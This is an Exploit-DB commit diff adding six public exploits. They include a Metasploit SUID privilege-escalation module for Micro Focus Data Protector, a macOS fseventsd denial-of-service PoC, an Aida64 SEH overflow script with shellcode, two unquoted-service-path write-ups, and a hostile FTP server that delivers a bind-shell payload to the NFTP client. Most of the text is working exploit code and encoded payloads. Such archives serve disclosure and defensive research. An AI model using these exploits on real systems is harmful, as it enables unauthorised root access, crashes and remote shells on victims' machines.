DB: 2019-11-05

6 changes to exploits/shellcodes

Apple macOS 10.15.1 - Denial of Service (PoC)
Aida64 6.10.5200 - Buffer Overflow (SEH)
OpenVPN Connect 3.0.0.272 - 'agent_ovpnconnect' Unquoted Service Path
Launch Manager 6.1.7600.16385 - 'DsiWMIService' Unquoted Service Path
Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)

Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
This commit is contained in:
Offensive Security 2019-11-05 05:01:42 +00:00
parent 47d2a76f4f
commit 577557762c
7 changed files with 695 additions and 0 deletions

134
exploits/linux/local/47580.rb Executable file
View file

@ -0,0 +1,134 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
'Description' => %q{
This module exploits the trusted `$PATH` environment
variable of the SUID binary `omniresolve` in
Micro Focus (HPE) Data Protector A.10.40 and prior.
The `omniresolve` executable calls the `oracleasm` binary using
a relative path and the trusted environment `$PATH`, which allows
an attacker to execute a custom binary with `root` privileges.
This module has been successfully tested on:
HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
The vulnerability has been patched in:
Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
},
'License' => MSF_LICENSE,
'Author' =>
[
's7u55', # Discovery and Metasploit module
],
'DisclosureDate' => '2019-09-13',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[
'Micro Focus (HPE) Data Protector <= 10.40 build 118',
upper_version: Gem::Version.new('10.40')
]
],
'DefaultOptions' =>
{
'PrependSetgid' => true,
'PrependSetuid' => true
},
'References' =>
[
[ 'CVE', '2019-11660' ],
[ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
]
))
register_options(
[
OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
])
register_advanced_options(
[
OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
end
def base_dir
datastore['WritableDir'].to_s
end
def suid_bin_path
datastore['SUID_PATH'].to_s
end
def check
unless setuid? suid_bin_path
vprint_error("#{suid_bin_path} executable is not setuid")
return CheckCode::Safe
end
info = cmd_exec("#{suid_bin_path} -ver").to_s
if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
version = '%.2f' % $1.to_f
build = $3.to_i
vprint_status("omniresolve version #{version} build #{build}")
unless Gem::Version.new(version) < target[:upper_version] ||
(Gem::Version.new(version) == target[:upper_version] && build <= 118)
return CheckCode::Safe
end
return CheckCode::Appears
end
vprint_error("Could not parse omniresolve -ver output")
CheckCode::Detected
end
def exploit
if check == CheckCode::Safe
unless datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
end
unless writable?(base_dir)
fail_with(Failure::BadConfig, "#{base_dir} is not writable")
end
payload_path = File.join(base_dir, 'oracleasm')
register_file_for_cleanup(payload_path)
write_file(payload_path, generate_payload_exe)
chmod(payload_path)
trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
register_file_for_cleanup(trigger_path)
write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
end
end

237
exploits/macos/dos/47578.c Normal file
View file

@ -0,0 +1,237 @@
# Exploit Title: Apple macOS 10.15.1 - Denial of Service (PoC)
# Date: 2019-11-02
# Exploit Author: 08Tc3wBB
# Vendor Homepage: Apple
# Software Link:
# Version: Apple macOS < 10.15.1 / iOS < 13.2
# Tested on: Tested on macOS 10.14.6 and iOS 12.4.1
# CVE : N/A
# Type : DOS
# https://support.apple.com/en-us/HT210721
----- Execution file path:
/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd
fseventsd running as root and unsandboxed on both iOS and macOS, and accessible from within the Application sandbox.
----- Analysis
Env: macOS 10.14.6
I named following pseudocode functions to help you understand the execution flow.
void __fastcall routine_1(mach_msg_header_t *msg, mach_msg_header_t *reply) // 0x100001285
{
...
v9 = implementation_register_rpc(
msg->msgh_local_port,
msg[1].msgh_size,
msg[4].msgh_reserved,
(unsigned int)msg[4].msgh_id,
*(_QWORD *)&msg[1].msgh_reserved, // input_mem1
msg[2].msgh_size >> 2, // input_mem1_len
*(_QWORD *)&msg[2].msgh_remote_port, // input_mem2
msg[2].msgh_id, // input_mem2_len
msg[5].msgh_remote_port,
*(_QWORD *)&msg[3].msgh_bits, // input_mem3
msg[3].msgh_local_port >> 2, // input_mem3_len
*(_QWORD *)&msg[3].msgh_reserved, // input_mem4
msg[4].msgh_size); // input_mem4_len
...
}
routine_1 will be executed when user send mach_msg to Mach Service "com.apple.FSEvents" with id 0x101D0
And routine_1 internally invokes a function called fsevent_add_client to process data included in input_mem1/input_mem2
I marked five places with: (1) (2) (3) (4) (5)
These are the essential points cause this vulnerability.
void *fsevent_add_client(...)
{
...
v25 = malloc(8LL * input_mem1_len); // (1) Allocate a new buffer with input_mem1_len, didn't initializing its content.
*(_QWORD *)(eventobj + 136) = v25; // Subsequently insert that new buffer into (eventobj + 136)
...
v20 = ... // v20 point to an array of strings that was created based on user input
// The following process is doing recursive parsing to v20
index = 0LL;
while ( 1 )
{
v26 = *(const char **)(v20 + 8 * index);
...
v28 = strstr(*(const char **)(v20 + 8 * index), "/.docid");
v27 = v26;
if ( !v28 ) // (2) If input string doesn't contain "/.docid", stop further parse, go straight to strdup
goto LABEL_15;
if ( strcmp(v28, "/.docid") ) // (3) If an input string doesn't exactly match "/.docid", goto LABEL_16
goto LABEL_16;
*(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(".docid");
LABEL_17:
if ( ++index >= input_mem1_len )
goto LABEL_21;
}
v27 = *(const char **)(v20 + 8 * index);
LABEL_15:
*(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(v27);
LABEL_16:
if ( *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) )
goto LABEL_17; // (4) So far the new buffer has never been initialized, but if it contain any wild value, it will goto LABEL_17, which program will retain that wild value and go on to parse next input_string
...
// (5) Since all values saved in the new buffer supposed to be the return value of strdup, they will all be free'd later on. So if spray works successfully, the attacker can now has the ability to call free() on any address, further develop it to modify existing memory data.
}
However there is a catch, fseventsd only allow input_mem1_len be 1 unless the requested proc has root privilege, led to the size of uninitialized buffer can only be 8, such small size caused it very volatile, hard to apply desired spray work unless discover something else to assist. Or exploit another system proc (sandboxed it's okay), and borrow their root credential to send the exploit msg.
----- PoC
// clang poc.c -framework CoreFoundation -o poc
#include <stdio.h>
#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>
#include <bootstrap.h>
mach_port_t server_port = 0;
mach_port_t get_server_port(){
if(server_port)
return server_port;
bootstrap_look_up(bootstrap_port, "com.apple.FSEvents", &server_port);
return server_port;
}
int trigger_bug = 0;
int has_reach_limit = 0;
uint32_t call_routine_1(){
struct SEND_Msg{
mach_msg_header_t Head;
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t port;
mach_msg_ool_descriptor_t mem1;
mach_msg_ool_descriptor_t mem2;
mach_msg_ool_descriptor_t mem3;
mach_msg_ool_descriptor_t mem4;
// Offset to here : +104
uint64_t unused_field1;
uint32_t input_num1; // +112
uint32_t input_num2; // +116
uint64_t len_auth1; // +120 length of mem1/mem2
uint32_t input_num3; // +128
uint64_t len_auth2; // +132 length of mem3/mem4
char unused_field[20];
};
struct RECV_Msg{
mach_msg_header_t Head; // Size: 24
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t port;
uint64_t NDR_record;
};
struct SEND_Msg *msg = malloc(0x100);
bzero(msg, 0x100);
msg->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND);
msg->Head.msgh_size = 160;
int kkk = get_server_port();
msg->Head.msgh_remote_port = kkk;
msg->Head.msgh_local_port = mig_get_reply_port();
msg->Head.msgh_id = 0x101D0;
msg->msgh_body.msgh_descriptor_count = 5;
msg->port.type = MACH_MSG_PORT_DESCRIPTOR;
msg->mem1.deallocate = false;
msg->mem1.copy = MACH_MSG_VIRTUAL_COPY;
msg->mem1.type = MACH_MSG_OOL_DESCRIPTOR;
memcpy(&msg->mem2, &msg->mem1, sizeof(msg->mem1));
memcpy(&msg->mem3, &msg->mem1, sizeof(msg->mem1));
memcpy(&msg->mem4, &msg->mem1, sizeof(msg->mem1));
mach_port_t port1=0;
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port1);
msg->port.name = port1;
msg->port.disposition = MACH_MSG_TYPE_MAKE_SEND;
uint64_t empty_data = 0;
if(trigger_bug){
msg->input_num1 = 5;
msg->mem1.address = &empty_data;
msg->mem1.size = 4;
msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
msg->mem2.address = "/.docid1";
msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
}
else{
msg->input_num1 = 1;
msg->mem1.address = &empty_data;
msg->mem1.size = 4;
msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
msg->mem2.address = "/.dacid1";
msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
}
msg->mem3.address = 0;
msg->mem3.size = 0;
msg->input_num3 = msg->mem3.size >> 2; // input_mem3_len_auth
msg->mem4.address = 0;
msg->mem4.size = 0;
msg->len_auth1 = ((uint64_t)msg->mem2.size << 32) | (msg->mem1.size >> 2);
msg->len_auth2 = ((uint64_t)msg->mem4.size << 32) | (msg->mem3.size >> 2);
mach_msg((mach_msg_header_t*)msg, MACH_SEND_MSG|(trigger_bug?0:MACH_RCV_MSG), msg->Head.msgh_size, 0x100, msg->Head.msgh_local_port, 0, 0);
int32_t errCode = *(int32_t*)(((char*)msg) + 0x20);
if(errCode == -21){
has_reach_limit = 1;
}
mig_dealloc_reply_port(msg->Head.msgh_local_port);
struct RECV_Msg *recv_msg = (void*)msg;
uint32_t return_port = recv_msg->port.name;
free(msg);
return return_port;
}
int main(int argc, const char * argv[]) {
printf("PoC started running...\n");
uint32_t aaa[1000];
for(int i=0; i<=1000; i++){
if(has_reach_limit){
trigger_bug = 1;
call_routine_1();
break;
}
aaa[i] = call_routine_1();
}
printf("Finished\n");
printf("Check crash file beneath /Library/Logs/DiagnosticReports/\n");
return 0;
}

70
exploits/windows/local/47574.py Executable file
View file

@ -0,0 +1,70 @@
# Exploit Title: Aida64 6.10.5200 - Buffer Overflow (SEH)
# Date: 2019-10-28
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage: https://www.aida64.com
# Software Link: https://www.aida64.com/downloads/OTAwMmVmNTE=
# Version: AIDA64 Enginner 6.10.5200
# Tested on: Windows 7 Home Basic SP1
# CVE : N/A
# Step
1) File -> Preferences -> Logging -> Log sensor readings to CSV log file
2) Paste payload from "aida64.txt" -> Apply
3) File -> Exit
# Exploit Code
#! Python
import struct
# shell code
buf = ""
buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"
buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54"
buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34"
buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f"
buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34"
buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32"
buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70"
buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d"
buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d"
buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61"
buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50"
buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c"
buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a"
buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57"
buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47"
buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56"
buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56"
buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44"
buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31"
buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71"
buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c"
buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b"
buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a"
buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f"
buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f"
buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32"
buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f"
buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72"
buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76"
buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b"
buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71"
buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c"
buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54"
buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d"
buf += "\x76\x74\x33\x79\x76\x35\x41\x41"
# Exploit Payload
sehNext = struct.pack('<L',0x909010EB) # SHORT JMP
sehHandler = struct.pack('<L',0x0120c8b6) # POP POP RET
payload = 'A' * (1115 - 4) + sehNext + sehHandler + "\x90" * 16 + buf +"B"*1000
f = open("aida64.txt", "wb")
f.write(payload)
f.close()

View file

@ -0,0 +1,34 @@
# Exploit Title: OpenVPN Connect 3.0.0.272 - 'ovpnagent' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-03
# Vendor Homepage: https://openvpn.net
# Software Link : https://openvpn.net/downloads/openvpn-connect-v3-windows.msi
# Tested Version: 3.0.0.(272)
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """
OpenVPN Agent agent_ovpnconnect agent_ovpnconnect C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe Auto
# Service info:
C:\>sc qc agent_ovpnconnect
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: agent_ovpnconnect
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OpenVPN Agent agent_ovpnconnect
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

View file

@ -0,0 +1,38 @@
# Title: Launch Manager 6.1.7600.16385 'DsiWMIService' Unquoted Service Path
# Author: Gustavo Briseño
# Date: 2019-11-03
# Vendor Homepage: https://www.acer.com/
# Software Link: https://global-download.acer.com/GDFiles/Application/LaunchManager/LaunchManager_Dritek_6.1.7600.16385_W7x86W7x64_A.zip?acerid=634193506101268520&Step1=NOTEBOOK&Step2=ASPIRE&Step3=ASPIRE%204333&OS=ALLLC=es&BC=ACER&SC=PA_2#_ga=2.248825730.460116227.1572829430-701800474.1572829429
# Version : Launch Manager 6.1.7600.16385
# Tested on: Windows 7 Home Basic 64bit
# CVE : N/A
# =====================================================
# 1. Description:
# Unquoted service paths in DsiWMIService have an unquoted service path.
#PoC
===========
C:\>sc qc DsiWMIService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DsiWMIService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Launch Manager\dsiwmis.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Dritek WMI Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>
#Exploit:
============
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.

176
exploits/windows/remote/47576.py Executable file
View file

@ -0,0 +1,176 @@
# Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
# Date: 2019-11-03
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
# Version: 1.71
# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
# Steps to reproduce:
# Run the server with the valid Windows version
# Connect the client to the malicious server
# bind shell on port 5150
#!/usr/bin/env python2
import os, sys, socket
NARGS = len(sys.argv)
# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# 7C923A95 FFD6 CALL ESI # Windows XP Pro SP3; ntdll.dll
# 7C927543 FFD6 CALL ESI # Windows XP Pro SP2; ntdll.dll
# 77E641C7 FFE6 JMP ESI # Windows XP Pro SP1; kernel32.dll
# 77E667F3 FFE6 JMP ESI # Windows XP Pro SP0: kernel32.dll
tourRETs = {
"XPProSP3": "\x95\x3A\x92\x7c",
"XPProSP2": "\x43\x75\x92\x7C",
"XPProSP1": "\xc7\x41\xe6\x77",
"XPProSP0": "\xf3\x67\xe6\x77"
}
if not NARGS > 1:
print("USAGE: %s version" % sys.argv[0])
print("[.] version must be in:")
for item in tourRETs:
print("\t%s" % item)
sys.exit(1)
# sploit = "A"*5000 # crash! in SYST cmd, 41414141 in EIP and EBP
# ESP and ESI both pointers to somewhere in the As
# If I increase the overflow string to 10000, the area ESP points to at crash
#, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.
# sploit = "A"*10000
# sploit = sys.argv[1] # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP
# `locate pattern_offset.rb |head -n 1` 46326846 10000 # 4116
sploit = "A"*4116
# Add the return address
try:
sploit += tourRETs[sys.argv[1]]
except KeyError, x:
print("[!] Version %s: not a valid version! Possibly bad capitalization" % str(x))
sys.exit(1)
sploit += ("\x90"*12) # original calcs based on RET*4... oops. realign.
# echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc # 0x69D (1693); ESP-ESI
sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs
# badchars = "\x00\x0a\x0d"
# locate EIP and align ESP to a close future 4 and 16 byte boundary
NOTES = """\
$-37 > D9EE FLDZ
$-35 > D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
$-31 > 59 POP ECX
$-30 > 80C1 09 ADD CL,9
$-2D > 80C1 04 ADD CL,4
$-2A > 80C1 2A ADD CL,2A
$-27 > 80C5 01 ADD CH,1
$-24 > 51 PUSH ECX
$-23 > 5C POP ESP
"""
sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes
sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes
sploit += "\x90" * 0x22 # ESP = EIP
sploit += "\x90" * 20 # sled for shikata_ga_nai unpack
# msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process
# -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c
sploit += (
"\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1"
"\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57"
"\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56"
"\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79"
"\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3"
"\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa"
"\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9"
"\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82"
"\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05"
"\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8"
"\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74"
"\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68"
"\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02"
"\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde"
"\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4"
"\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba"
"\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f"
"\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83"
"\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07"
"\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51"
"\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb"
"\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4"
"\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04"
) # 355
sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)
cases = {
"USER": "331 user OK. Pass required",
"PASS": "230 OK, current directory is /",
# "SYST": "215 UNIX Type: L8",
"SYST": sploit, # CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP
"TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",
"SITE UMASK": "500 SITE UMASK is an unknown extension",
"CWD": "250 OK, current directory whatever you think it is",
"PORT": "200 PORT command successful",
"PASV": "227 Entering PASV mode",
"LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"
}
sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sx.bind(("192.168.56.181",21))
sx.listen(5)
print("[.] Standing up HostileFTPd v0.0 alpha, port 21")
cx,addr = sx.accept()
print("[!] Connection received from %s" % str(addr))
cx.send("220 HostileFTPd v0.0 alpha !\r\n")
notified = 0
while True:
req = cx.recv(1024)
for key, resp in cases.items():
if key in req:
cx.send(resp + "\r\n")
if "SITE UMASK" in req and notified == 0:
print("[!] Buffer sent. Bind shell on client's port 5150?")
notified = 1
if "PASV" in req:
justpause = raw_input("[.] PASV received. Pausing recv buffer")
NOTES="""\
### followed TCP stream in normal client connect to ftp server
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 13:47. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
USER bozo
331 User bozo OK. Password required
PASS theclown
230-User bozo has group access to: 1003
230 OK. Current directory is /
SYST
215 UNIX Type: L8
TYPE I
200 TYPE is now 8-bit binary
SITE UMASK 022
500 SITE UMASK is an unknown extension
CWD /
250 OK. Current directory is /
PASV
227 Entering Passive Mode (192,168,56,181,183,29)
LIST -a
150 Accepted data connection
226-ASCII
226-Options: -a -l
226 3 matches total
"""

View file

@ -6584,6 +6584,7 @@ id,file,description,date,author,type,platform,port
47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple,
47563,exploits/windows/dos/47563.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service",2019-10-30,"Nithoshitha S",dos,windows,
47565,exploits/multiple/dos/47565.txt,"JavaScriptCore - GetterSetter Type Confusion During DFG Compilation",2019-10-30,"Google Security Research",dos,multiple,
47578,exploits/macos/dos/47578.c,"Apple macOS 10.15.1 - Denial of Service (PoC)",2019-11-04,08Tc3wBB,dos,macos,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10741,6 +10742,10 @@ id,file,description,date,author,type,platform,port
47556,exploits/windows/local/47556.txt,"Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path",2019-10-29,"Alberto Vargas",local,windows,
47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows,
47570,exploits/windows/local/47570.txt,"OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path",2019-11-01,"Sainadh Jamalpur",local,windows,
47574,exploits/windows/local/47574.py,"Aida64 6.10.5200 - Buffer Overflow (SEH)",2019-11-04,daejinoh,local,windows,
47575,exploits/windows/local/47575.txt,"OpenVPN Connect 3.0.0.272 - 'agent_ovpnconnect' Unquoted Service Path",2019-11-04,"Luis Martínez",local,windows,
47577,exploits/windows/local/47577.txt,"Launch Manager 6.1.7600.16385 - 'DsiWMIService' Unquoted Service Path",2019-11-04,"Gustavo Briseño",local,windows,
47580,exploits/linux/local/47580.rb,"Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)",2019-11-04,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17748,6 +17753,7 @@ id,file,description,date,author,type,platform,port
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
